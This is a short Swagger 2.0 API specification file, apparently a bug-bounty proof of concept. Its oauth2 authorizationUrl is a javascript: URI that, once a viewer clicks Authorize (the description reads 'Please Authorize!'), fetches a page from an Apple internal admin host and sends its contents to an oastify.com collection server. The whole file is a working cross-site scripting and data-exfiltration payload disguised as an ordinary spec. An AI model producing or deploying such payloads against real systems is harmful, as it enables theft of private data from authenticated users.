swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:fetch('https://mymessage-corp.apple.com/mmadmin/').then(a=> a.text()).then(a=> fetch('https://xdeh3n7ovyvxv7fp161q0qpgk7qxem.oastify.com?x='+a))//
info:
  version: "0.0.1"
  title: Example Title
  description: Please Authorize!
paths:
  /:
    get:
      responses:
        200:
          description: Successful respons
